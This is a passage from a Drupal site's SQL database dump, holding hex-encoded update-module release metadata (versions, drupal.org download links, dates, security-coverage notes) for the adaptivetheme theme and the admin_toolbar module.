732f372e312e31223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36343a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f61646170746976657468656d652d372e312e312e7461722e677a223b733a343a2264617465223b733a31303a2231373338353131303332223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a393a22427567206669786573223b7d7d733a383a227365637572697479223b733a34343a22436f76657265642062792044727570616c27732073656375726974792061647669736f727920706f6c696379223b733a31383a22636f72655f636f6d7061746962696c697479223b733a31303a225e3130207c7c205e3131223b7d733a353a22372e312e30223b613a31313a7b733a343a226e616d65223b733a31393a2261646170746976657468656d6520372e312e30223b733a373a2276657273696f6e223b733a353a22372e312e30223b733a333a22746167223b733a353a22372e312e30223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35393a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f61646170746976657468656d652f72656c65617365732f372e312e30223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36343a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f61646170746976657468656d652d372e312e302e7461722e677a223b733a343a2264617465223b733a31303a2231373138383832383130223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a393a22427567206669786573223b7d7d733a383a227365637572697479223b733a34343a22436f76657265642062792044727570616c27732073656375726974792061647669736f727920706f6c696379223b733a31383a22636f72655f636f6d7061746962696c697479223b733a31303a225e3130207c7c205e3131223b7d733a353a22372e302e30223b613a31313a7b733a343a226e616d65223b733a31393a2261646170746976657468656d6520372e302e30223b733a373a2276657273696f6e223b733a353a22372e302e30223b733a333a22746167223b733a353a22372e302e30223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35393a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f61646170746976657468656d652f72656c65617365732f372e302e30223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36343a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f61646170746976657468656d652d372e302e302e7461722e677a223b733a343a2264617465223b733a31303a2231373135333433303138223b733a353a2266696c6573223b733a303a22223b733a383a227365637572697479223b733a34343a22436f76657265642062792044727570616c27732073656375726974792061647669736f727920706f6c696379223b733a31383a22636f72655f636f6d7061746962696c697479223b733a31303a225e3130207c7c205e3131223b733a353a227465726d73223b613a303a7b7d7d733a373a22382e782d362e34223b613a31313a7b733a343a226e616d65223b733a32313a2261646170746976657468656d6520382e782d362e34223b733a373a2276657273696f6e223b733a373a22382e782d362e34223b733a333a22746167223b733a373a22382e782d362e34223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a36313a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f61646170746976657468656d652f72656c65617365732f382e782d362e34223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36363a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f61646170746976657468656d652d382e782d362e342e7461722e677a223b733a343a2264617465223b733a31303a2231373138383832383836223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a393a22427567206669786573223b7d7d733a383a227365637572697479223b733a34343a22436f76657265642062792044727570616c27732073656375726974792061647669736f727920706f6c696379223b733a31383a22636f72655f636f6d7061746962696c697479223b733a31303a225e3130207c7c205e3131223b7d733a373a22382e782d362e31223b613a31313a7b733a343a226e616d65223b733a32313a2261646170746976657468656d6520382e782d362e31223b733a373a2276657273696f6e223b733a373a22382e782d362e31223b733a333a22746167223b733a373a22382e782d362e31223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a36313a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f61646170746976657468656d652f72656c65617365732f382e782d362e31223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36363a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f61646170746976657468656d652d382e782d362e312e7461722e677a223b733a343a2264617465223b733a31303a2231373133393535393036223b733a353a2266696c6573223b733a303a22223b733a383a227365637572697479223b733a34343a22436f76657265642062792044727570616c27732073656375726974792061647669736f727920706f6c696379223b733a31383a22636f72655f636f6d7061746962696c697479223b733a31303a225e3130207c7c205e3131223b733a353a227465726d73223b613a303a7b7d7d733a373a22382e782d362e30223b613a31313a7b733a343a226e616d65223b733a32313a2261646170746976657468656d6520382e782d362e30223b733a373a2276657273696f6e223b733a373a22382e782d362e30223b733a333a22746167223b733a373a22382e782d362e30223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a36313a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f61646170746976657468656d652f72656c65617365732f382e782d362e30223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36363a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f61646170746976657468656d652d382e782d362e302e7461722e677a223b733a343a2264617465223b733a31303a2231373133333635363235223b733a353a2266696c6573223b733a303a22223b733a383a227365637572697479223b733a34343a22436f76657265642062792044727570616c27732073656375726974792061647669736f727920706f6c696379223b733a31383a22636f72655f636f6d7061746962696c697479223b733a31303a225e3130207c7c205e3131223b733a353a227465726d73223b613a303a7b7d7d733a373a22382e782d352e34223b613a31313a7b733a343a226e616d65223b733a32313a2261646170746976657468656d6520382e782d352e34223b733a373a2276657273696f6e223b733a373a22382e782d352e34223b733a333a22746167223b733a373a22382e782d352e34223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a36313a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f61646170746976657468656d652f72656c65617365732f382e782d352e34223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36363a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f61646170746976657468656d652d382e782d352e342e7461722e677a223b733a343a2264617465223b733a31303a2231373133393535383236223b733a353a2266696c6573223b733a303a22223b733a383a227365637572697479223b733a34343a22436f76657265642062792044727570616c27732073656375726974792061647669736f727920706f6c696379223b733a31383a22636f72655f636f6d7061746962696c697479223b733a31313a225e392e33207c7c205e3130223b733a353a227465726d73223b613a303a7b7d7d733a373a22382e782d352e33223b613a31313a7b733a343a226e616d65223b733a32313a2261646170746976657468656d6520382e782d352e33223b733a373a2276657273696f6e223b733a373a22382e782d352e33223b733a333a22746167223b733a373a22382e782d352e33223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a36313a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f61646170746976657468656d652f72656c65617365732f382e782d352e33223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36363a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f61646170746976657468656d652d382e782d352e332e7461722e677a223b733a343a2264617465223b733a31303a2231373133303438333933223b733a353a2266696c6573223b733a303a22223b733a383a227365637572697479223b733a34343a22436f76657265642062792044727570616c27732073656375726974792061647669736f727920706f6c696379223b733a31383a22636f72655f636f6d7061746962696c697479223b733a31313a225e392e33207c7c205e3130223b733a353a227465726d73223b613a303a7b7d7d733a373a22382e782d352e32223b613a31313a7b733a343a226e616d65223b733a32313a2261646170746976657468656d6520382e782d352e32223b733a373a2276657273696f6e223b733a373a22382e782d352e32223b733a333a22746167223b733a373a22382e782d352e32223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a36313a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f61646170746976657468656d652f72656c65617365732f382e782d352e32223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36363a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f61646170746976657468656d652d382e782d352e322e7461722e677a223b733a343a2264617465223b733a31303a2231373034353632323837223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a393a22427567206669786573223b7d7d733a383a227365637572697479223b733a34343a22436f76657265642062792044727570616c27732073656375726974792061647669736f727920706f6c696379223b733a31383a22636f72655f636f6d7061746962696c697479223b733a31313a225e392e33207c7c205e3130223b7d733a373a22382e782d352e31223b613a31313a7b733a343a226e616d65223b733a32313a2261646170746976657468656d6520382e782d352e31223b733a373a2276657273696f6e223b733a373a22382e782d352e31223b733a333a22746167223b733a373a22382e782d352e31223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a36313a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f61646170746976657468656d652f72656c65617365732f382e782d352e31223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36363a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f61646170746976657468656d652d382e782d352e312e7461722e677a223b733a343a2264617465223b733a31303a2231363433393032363336223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a393a22427567206669786573223b7d7d733a383a227365637572697479223b733a34343a22436f76657265642062792044727570616c27732073656375726974792061647669736f727920706f6c696379223b733a31383a22636f72655f636f6d7061746962696c697479223b733a31313a225e392e33207c7c205e3130223b7d733a373a22382e782d352e30223b613a31313a7b733a343a226e616d65223b733a32313a2261646170746976657468656d6520382e782d352e30223b733a373a2276657273696f6e223b733a373a22382e782d352e30223b733a333a22746167223b733a373a22382e782d352e30223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a36313a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f61646170746976657468656d652f72656c65617365732f382e782d352e30223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36363a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f61646170746976657468656d652d382e782d352e302e7461722e677a223b733a343a2264617465223b733a31303a2231363433393031373437223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a31323a224e6577206665617475726573223b7d7d733a383a227365637572697479223b733a34343a22436f76657265642062792044727570616c27732073656375726974792061647669736f727920706f6c696379223b733a31383a22636f72655f636f6d7061746962696c697479223b733a31313a225e392e33207c7c205e3130223b7d733a373a22382e782d342e31223b613a31313a7b733a343a226e616d65223b733a32313a2261646170746976657468656d6520382e782d342e31223b733a373a2276657273696f6e223b733a373a22382e782d342e31223b733a333a22746167223b733a373a22382e782d342e31223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a36313a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f61646170746976657468656d652f72656c65617365732f382e782d342e31223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36363a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f61646170746976657468656d652d382e782d342e312e7461722e677a223b733a343a2264617465223b733a31303a2231363337313733313033223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a393a22427567206669786573223b7d7d733a383a227365637572697479223b733a34343a22436f76657265642062792044727570616c27732073656375726974792061647669736f727920706f6c696379223b733a31383a22636f72655f636f6d7061746962696c697479223b733a31303a225e382e38207c7c205e39223b7d733a373a22382e782d342e30223b613a31313a7b733a343a226e616d65223b733a32313a2261646170746976657468656d6520382e782d342e30223b733a373a2276657273696f6e223b733a373a22382e782d342e30223b733a333a22746167223b733a373a22382e782d342e30223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a36313a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f61646170746976657468656d652f72656c65617365732f382e782d342e30223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36363a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f61646170746976657468656d652d382e782d342e302e7461722e677a223b733a343a2264617465223b733a31303a2231363335383633373034223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a323a7b693a303b733a393a22427567206669786573223b693a313b733a31323a224e6577206665617475726573223b7d7d733a383a227365637572697479223b733a34343a22436f76657265642062792044727570616c27732073656375726974792061647669736f727920706f6c696379223b733a31383a22636f72655f636f6d7061746962696c697479223b733a31303a225e382e38207c7c205e39223b7d733a373a22382e782d332e31223b613a31313a7b733a343a226e616d65223b733a32313a2261646170746976657468656d6520382e782d332e31223b733a373a2276657273696f6e223b733a373a22382e782d332e31223b733a333a22746167223b733a373a22382e782d332e31223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a36313a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f61646170746976657468656d652f72656c65617365732f382e782d332e31223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36363a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f61646170746976657468656d652d382e782d332e312e7461722e677a223b733a343a2264617465223b733a31303a2231353138343739383830223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a393a22427567206669786573223b7d7d733a383a227365637572697479223b733a34343a22436f76657265642062792044727570616c27732073656375726974792061647669736f727920706f6c696379223b733a31383a22636f72655f636f6d7061746962696c697479223b733a333a22382e78223b7d733a373a22382e782d332e30223b613a31313a7b733a343a226e616d65223b733a32313a2261646170746976657468656d6520382e782d332e30223b733a373a2276657273696f6e223b733a373a22382e782d332e30223b733a333a22746167223b733a373a22382e782d332e30223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a36313a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f61646170746976657468656d652f72656c65617365732f382e782d332e30223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36363a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f61646170746976657468656d652d382e782d332e302e7461722e677a223b733a343a2264617465223b733a31303a2231353131343734323835223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a393a22427567206669786573223b7d7d733a383a227365637572697479223b733a34343a22436f76657265642062792044727570616c27732073656375726974792061647669736f727920706f6c696379223b733a31383a22636f72655f636f6d7061746962696c697479223b733a333a22382e78223b7d733a373a22382e782d322e31223b613a31313a7b733a343a226e616d65223b733a32313a2261646170746976657468656d6520382e782d322e31223b733a373a2276657273696f6e223b733a373a22382e782d322e31223b733a333a22746167223b733a373a22382e782d322e31223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a36313a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f61646170746976657468656d652f72656c65617365732f382e782d322e31223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36363a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f61646170746976657468656d652d382e782d322e312e7461722e677a223b733a343a2264617465223b733a31303a2231353131343733393835223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a393a22427567206669786573223b7d7d733a383a227365637572697479223b733a34343a22436f76657265642062792044727570616c27732073656375726974792061647669736f727920706f6c696379223b733a31383a22636f72655f636f6d7061746962696c697479223b733a333a22382e78223b7d733a373a22382e782d322e30223b613a31313a7b733a343a226e616d65223b733a32313a2261646170746976657468656d6520382e782d322e30223b733a373a2276657273696f6e223b733a373a22382e782d322e30223b733a333a22746167223b733a373a22382e782d322e30223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a36313a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f61646170746976657468656d652f72656c65617365732f382e782d322e30223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36363a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f61646170746976657468656d652d382e782d322e302e7461722e677a223b733a343a2264617465223b733a31303a2231343838343935343834223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a323a7b693a303b733a393a22427567206669786573223b693a313b733a31323a224e6577206665617475726573223b7d7d733a383a227365637572697479223b733a34343a22436f76657265642062792044727570616c27732073656375726974792061647669736f727920706f6c696379223b733a31383a22636f72655f636f6d7061746962696c697479223b733a333a22382e78223b7d733a373a22382e782d312e30223b613a31313a7b733a343a226e616d65223b733a32313a2261646170746976657468656d6520382e782d312e30223b733a373a2276657273696f6e223b733a373a22382e782d312e30223b733a333a22746167223b733a373a22382e782d312e30223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a36313a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f61646170746976657468656d652f72656c65617365732f382e782d312e30223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36363a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f61646170746976657468656d652d382e782d312e302e7461722e677a223b733a343a2264617465223b733a31303a2231343838343935373833223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a323a7b693a303b733a393a22427567206669786573223b693a313b733a31323a224e6577206665617475726573223b7d7d733a383a227365637572697479223b733a34343a22436f76657265642062792044727570616c27732073656375726974792061647669736f727920706f6c696379223b733a31383a22636f72655f636f6d7061746962696c697479223b733a333a22382e78223b7d733a31313a22382e782d312e302d726332223b613a31313a7b733a343a226e616d65223b733a32353a2261646170746976657468656d6520382e782d312e302d726332223b733a373a2276657273696f6e223b733a31313a22382e782d312e302d726332223b733a333a22746167223b733a31313a22382e782d312e302d726332223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a36353a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f61646170746976657468656d652f72656c65617365732f382e782d312e302d726332223b733a31333a22646f776e6c6f61645f6c696e6b223b733a37303a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f61646170746976657468656d652d382e782d312e302d7263322e7461722e677a223b733a343a2264617465223b733a31303a2231343638323430373339223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a323a7b693a303b733a393a22427567206669786573223b693a313b733a31323a224e6577206665617475726573223b7d7d733a383a227365637572697479223b733a35383a2252432072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b733a31383a22636f72655f636f6d7061746962696c697479223b733a333a22382e78223b7d733a31313a22382e782d312e302d726331223b613a31313a7b733a343a226e616d65223b733a32353a2261646170746976657468656d6520382e782d312e302d726331223b733a373a2276657273696f6e223b733a31313a22382e782d312e302d726331223b733a333a22746167223b733a31313a22382e782d312e302d726331223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a36353a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f61646170746976657468656d652f72656c65617365732f382e782d312e302d726331223b733a31333a22646f776e6c6f61645f6c696e6b223b733a37303a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f61646170746976657468656d652d382e782d312e302d7263312e7461722e677a223b733a343a2264617465223b733a31303a2231343633343839303430223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a31323a224e6577206665617475726573223b7d7d733a383a227365637572697479223b733a35383a2252432072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b733a31383a22636f72655f636f6d7061746962696c697479223b733a333a22382e78223b7d733a393a22372e302e782d646576223b613a31313a7b733a343a226e616d65223b733a32333a2261646170746976657468656d6520372e302e782d646576223b733a373a2276657273696f6e223b733a393a22372e302e782d646576223b733a333a22746167223b733a353a22372e302e78223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a36333a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f61646170746976657468656d652f72656c65617365732f372e302e782d646576223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36383a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f61646170746976657468656d652d372e302e782d6465762e7461722e677a223b733a343a2264617465223b733a31303a2231373338353130373730223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a393a22427567206669786573223b7d7d733a383a227365637572697479223b733a35393a224465762072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b733a31383a22636f72655f636f6d7061746962696c697479223b733a31303a225e3130207c7c205e3131223b7d733a31313a22382e782d362e782d646576223b613a31313a7b733a343a226e616d65223b733a32353a2261646170746976657468656d6520382e782d362e782d646576223b733a373a2276657273696f6e223b733a31313a22382e782d362e782d646576223b733a333a22746167223b733a373a22382e782d362e78223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a36353a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f61646170746976657468656d652f72656c65617365732f382e782d362e782d646576223b733a31333a22646f776e6c6f61645f6c696e6b223b733a37303a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f61646170746976657468656d652d382e782d362e782d6465762e7461722e677a223b733a343a2264617465223b733a31303a2231373338353130343537223b733a353a2266696c6573223b733a303a22223b733a383a227365637572697479223b733a35393a224465762072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b733a31383a22636f72655f636f6d7061746962696c697479223b733a31303a225e3130207c7c205e3131223b733a353a227465726d73223b613a303a7b7d7d733a31313a22382e782d352e782d646576223b613a31313a7b733a343a226e616d65223b733a32353a2261646170746976657468656d6520382e782d352e782d646576223b733a373a2276657273696f6e223b733a31313a22382e782d352e782d646576223b733a333a22746167223b733a373a22382e782d352e78223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a36353a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f61646170746976657468656d652f72656c65617365732f382e782d352e782d646576223b733a31333a22646f776e6c6f61645f6c696e6b223b733a37303a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f61646170746976657468656d652d382e782d352e782d6465762e7461722e677a223b733a343a2264617465223b733a31303a2231373133393535343631223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a31323a224e6577206665617475726573223b7d7d733a383a227365637572697479223b733a35393a224465762072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b733a31383a22636f72655f636f6d7061746962696c697479223b733a31313a225e392e33207c7c205e3130223b7d733a31313a22382e782d342e782d646576223b613a31313a7b733a343a226e616d65223b733a32353a2261646170746976657468656d6520382e782d342e782d646576223b733a373a2276657273696f6e223b733a31313a22382e782d342e782d646576223b733a333a22746167223b733a373a22382e782d342e78223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a36353a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f61646170746976657468656d652f72656c65617365732f382e782d342e782d646576223b733a31333a22646f776e6c6f61645f6c696e6b223b733a37303a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f61646170746976657468656d652d382e782d342e782d6465762e7461722e677a223b733a343a2264617465223b733a31303a2231363335383735323030223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a31323a224e6577206665617475726573223b7d7d733a383a227365637572697479223b733a35393a224465762072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b733a31383a22636f72655f636f6d7061746962696c697479223b733a31303a225e382e38207c7c205e39223b7d733a31313a22382e782d332e782d646576223b613a31313a7b733a343a226e616d65223b733a32353a2261646170746976657468656d6520382e782d332e782d646576223b733a373a2276657273696f6e223b733a31313a22382e782d332e782d646576223b733a333a22746167223b733a373a22382e782d332e78223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a36353a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f61646170746976657468656d652f72656c65617365732f382e782d332e782d646576223b733a31333a22646f776e6c6f61645f6c696e6b223b733a37303a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f61646170746976657468656d652d382e782d332e782d6465762e7461722e677a223b733a343a2264617465223b733a31303a2231353231303631393834223b733a353a2266696c6573223b733a303a22223b733a383a227365637572697479223b733a35393a224465762072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b733a31383a22636f72655f636f6d7061746962696c697479223b733a333a22382e78223b733a353a227465726d73223b613a303a7b7d7d733a31313a22382e782d322e782d646576223b613a31313a7b733a343a226e616d65223b733a32353a2261646170746976657468656d6520382e782d322e782d646576223b733a373a2276657273696f6e223b733a31313a22382e782d322e782d646576223b733a333a22746167223b733a373a22382e782d322e78223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a36353a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f61646170746976657468656d652f72656c65617365732f382e782d322e782d646576223b733a31333a22646f776e6c6f61645f6c696e6b223b733a37303a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f61646170746976657468656d652d382e782d322e782d6465762e7461722e677a223b733a343a2264617465223b733a31303a2231353130323639313834223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a323a7b693a303b733a393a22427567206669786573223b693a313b733a31323a224e6577206665617475726573223b7d7d733a383a227365637572697479223b733a35393a224465762072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b733a31383a22636f72655f636f6d7061746962696c697479223b733a333a22382e78223b7d733a31313a22382e782d312e782d646576223b613a31313a7b733a343a226e616d65223b733a32353a2261646170746976657468656d6520382e782d312e782d646576223b733a373a2276657273696f6e223b733a31313a22382e782d312e782d646576223b733a333a22746167223b733a373a22382e782d312e78223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a36353a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f61646170746976657468656d652f72656c65617365732f382e782d312e782d646576223b733a31333a22646f776e6c6f61645f6c696e6b223b733a303a22223b733a343a2264617465223b733a31303a2231353034333330343434223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a31323a224e6577206665617475726573223b7d7d733a383a227365637572697479223b733a35393a224465762072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b733a31383a22636f72655f636f6d7061746962696c697479223b733a333a22382e78223b7d7d733a31303a226c6173745f6665746368223b693a313738373833363338313b7d, 1787922781);
INSERT INTO `key_value_expire` (`collection`, `name`, `value`, `expire`) VALUES
('update_available_releases', 'admin_toolbar', 0x613a31303a7b733a353a227469746c65223b733a31333a2241646d696e20546f6f6c626172223b733a31303a2273686f72745f6e616d65223b733a31333a2261646d696e5f746f6f6c626172223b733a343a2274797065223b733a31343a2270726f6a6563745f6d6f64756c65223b733a31383a22737570706f727465645f6272616e63686573223b733a393a22332e352e2c332e362e223b733a31383a22636f6d706f7365725f6e616d657370616365223b733a32303a2264727570616c2f61646d696e5f746f6f6c626172223b733a31343a2270726f6a6563745f737461747573223b733a393a227075626c6973686564223b733a343a226c696e6b223b733a34343a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f61646d696e5f746f6f6c626172223b733a353a227465726d73223b733a303a22223b733a383a2272656c6561736573223b613a36313a7b733a353a22332e362e33223b613a31313a7b733a343a226e616d65223b733a31393a2261646d696e5f746f6f6c62617220332e362e33223b733a373a2276657273696f6e223b733a353a22332e362e33223b733a333a22746167223b733a353a22332e362e33223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35393a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f61646d696e5f746f6f6c6261722f72656c65617365732f332e362e33223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36343a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f61646d696e5f746f6f6c6261722d332e362e332e7461722e677a223b733a343a2264617465223b733a31303a2231373637313237323639223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a323a7b693a303b733a393a22427567206669786573223b693a313b733a31323a224e6577206665617475726573223b7d7d733a383a227365637572697479223b733a34343a22436f76657265642062792044727570616c27732073656375726974792061647669736f727920706f6c696379223b733a31383a22636f72655f636f6d7061746962696c697479223b733a31383a225e392e35207c7c205e3130207c7c205e3131223b7d733a353a22332e362e32223b613a31313a7b733a343a226e616d65223b733a31393a2261646d696e5f746f6f6c62617220332e362e32223b733a373a2276657273696f6e223b733a353a22332e3